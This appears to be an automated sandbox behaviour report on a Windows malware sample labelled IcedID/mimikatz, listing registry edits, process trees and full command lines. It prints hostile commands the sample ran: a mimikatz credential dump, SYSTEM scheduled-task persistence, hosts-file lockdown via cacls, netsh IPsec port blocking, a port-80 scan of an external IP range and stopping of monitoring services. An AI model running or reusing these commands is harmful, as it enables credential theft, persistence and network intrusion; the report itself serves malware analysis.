opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pnreyic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ttsqkuccf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4700 cmd.exe 3652 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000d000000023b49-6.dat nsis_installer_2 behavioral2/files/0x0008000000023c38-15.dat nsis_installer_1 behavioral2/files/0x0008000000023c38-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" pnreyic.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3652 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2264 schtasks.exe 3612 schtasks.exe 3480 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 368 pnreyic.exe Token: SeDebugPrivilege 3124 pnreyic.exe Token: SeDebugPrivilege 2520 vfshost.exe Token: SeDebugPrivilege 1260 cntrtrctt.exe Token: SeLockMemoryPrivilege 2028 zergmt.exe Token: SeLockMemoryPrivilege 2028 zergmt.exe Token: SeDebugPrivilege 1344 cntrtrctt.exe Token: SeDebugPrivilege 1156 cntrtrctt.exe Token: SeDebugPrivilege 772 cntrtrctt.exe Token: SeDebugPrivilege 1064 cntrtrctt.exe Token: SeDebugPrivilege 1100 cntrtrctt.exe Token: SeDebugPrivilege 1620 cntrtrctt.exe Token: SeDebugPrivilege 3220 cntrtrctt.exe Token: SeDebugPrivilege 2248 cntrtrctt.exe Token: SeDebugPrivilege 1684 cntrtrctt.exe Token: SeDebugPrivilege 3860 cntrtrctt.exe Token: SeDebugPrivilege 3004 cntrtrctt.exe Token: SeDebugPrivilege 216 cntrtrctt.exe Token: SeDebugPrivilege 1832 cntrtrctt.exe Token: SeDebugPrivilege 3600 cntrtrctt.exe Token: SeDebugPrivilege 2468 cntrtrctt.exe Token: SeDebugPrivilege 2688 cntrtrctt.exe Token: SeDebugPrivilege 4440 cntrtrctt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe 368 pnreyic.exe 368 pnreyic.exe 3124 pnreyic.exe 3124 pnreyic.exe 4712 xohudmc.exe 2204 vanpws.exe 4312 pnreyic.exe 4312 pnreyic.exe 1800 pnreyic.exe 1800 pnreyic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2968 wrote to memory of 4700 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe 83 PID 2968 wrote to memory of 4700 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe 83 PID 2968 wrote to memory of 4700 2968 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe 83 PID 4700 wrote to memory of 3652 4700 cmd.exe 85 PID 4700 wrote to memory of 3652 4700 cmd.exe 85 PID 4700 wrote to memory of 3652 4700 cmd.exe 85 PID 4700 wrote to memory of 368 4700 cmd.exe 87 PID 4700 wrote to memory of 368 4700 cmd.exe 87 PID 4700 wrote to memory of 368 4700 cmd.exe 87 PID 3124 wrote to memory of 1260 3124 pnreyic.exe 89 PID 3124 wrote to memory of 1260 3124 pnreyic.exe 89 PID 3124 wrote to memory of 1260 3124 pnreyic.exe 89 PID 1260 wrote to memory of 1380 1260 cmd.exe 91 PID 1260 wrote to memory of 1380 1260 cmd.exe 91 PID 1260 wrote to memory of 1380 1260 cmd.exe 91 PID 1260 wrote to memory of 396 1260 cmd.exe 92 PID 1260 wrote to memory of 396 1260 cmd.exe 92 PID 1260 wrote to memory of 396 1260 cmd.exe 92 PID 1260 wrote to memory of 2228 1260 cmd.exe 93 PID 1260 wrote to memory of 2228 1260 cmd.exe 93 PID 1260 wrote to memory of 2228 1260 cmd.exe 93 PID 1260 wrote to memory of 2564 1260 cmd.exe 94 PID 1260 wrote to memory of 2564 1260 cmd.exe 94 PID 1260 wrote to memory of 2564 1260 cmd.exe 94 PID 1260 wrote to memory of 3244 1260 cmd.exe 95 PID 1260 wrote to memory of 3244 1260 cmd.exe 95 PID 1260 wrote to memory of 3244 1260 cmd.exe 95 PID 1260 wrote to memory of 4748 1260 cmd.exe 96 PID 1260 wrote to memory of 4748 1260 cmd.exe 96 PID 1260 wrote to memory of 4748 1260 cmd.exe 96 PID 3124 wrote to memory of 1060 3124 pnreyic.exe 98 PID 3124 wrote to memory of 1060 3124 pnreyic.exe 98 PID 3124 wrote to memory of 1060 3124 pnreyic.exe 98 PID 3124 wrote to memory of 880 3124 pnreyic.exe 100 PID 3124 wrote to memory of 880 3124 pnreyic.exe 100 PID 3124 wrote to memory of 880 3124 pnreyic.exe 100 PID 3124 wrote to memory of 2388 3124 pnreyic.exe 102 PID 3124 wrote to memory of 2388 3124 pnreyic.exe 102 PID 3124 wrote to memory of 2388 3124 pnreyic.exe 102 PID 3124 wrote to memory of 5008 3124 pnreyic.exe 117 PID 3124 wrote to memory of 5008 3124 pnreyic.exe 117 PID 3124 wrote to memory of 5008 3124 pnreyic.exe 117 PID 5008 wrote to memory of 1516 5008 cmd.exe 119 PID 5008 wrote to memory of 1516 5008 cmd.exe 119 PID 5008 wrote to memory of 1516 5008 cmd.exe 119 PID 1516 wrote to memory of 436 1516 wpcap.exe 120 PID 1516 wrote to memory of 436 1516 wpcap.exe 120 PID 1516 wrote to memory of 436 1516 wpcap.exe 120 PID 436 wrote to memory of 4768 436 net.exe 122 PID 436 wrote to memory of 4768 436 net.exe 122 PID 436 wrote to memory of 4768 436 net.exe 122 PID 1516 wrote to memory of 716 1516 wpcap.exe 123 PID 1516 wrote to memory of 716 1516 wpcap.exe 123 PID 1516 wrote to memory of 716 1516 wpcap.exe 123 PID 716 wrote to memory of 1252 716 net.exe 125 PID 716 wrote to memory of 1252 716 net.exe 125 PID 716 wrote to memory of 1252 716 net.exe 125 PID 1516 wrote to memory of 3412 1516 wpcap.exe 126 PID 1516 wrote to memory of 3412 1516 wpcap.exe 126 PID 1516 wrote to memory of 3412 1516 wpcap.exe 126 PID 3412 wrote to memory of 864 3412 net.exe 128 PID 3412 wrote to memory of 864 3412 net.exe 128 PID 3412 wrote to memory of 864 3412 net.exe 128 PID 1516 wrote to memory of 4372 1516 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1012
-
C:\Windows\TEMP\gcettrccj\zergmt.exe"C:\Windows\TEMP\gcettrccj\zergmt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hrmeszcf\pnreyic.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3652
-
-
C:\Windows\hrmeszcf\pnreyic.exeC:\Windows\hrmeszcf\pnreyic.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:368
-
-
-
C:\Windows\hrmeszcf\pnreyic.exeC:\Windows\hrmeszcf\pnreyic.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2228
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3244
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4748
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:880
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\nblmptktz\etgfqftjv\wpcap.exeC:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:864
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2788
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1832
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4524
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exeC:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nblmptktz\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2664 -
C:\Windows\nblmptktz\Corporate\vfshost.exeC:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"2⤵PID:4488
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"2⤵PID:880
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3480
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2208
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3304
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4396
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1776
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2760
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:812
-
-
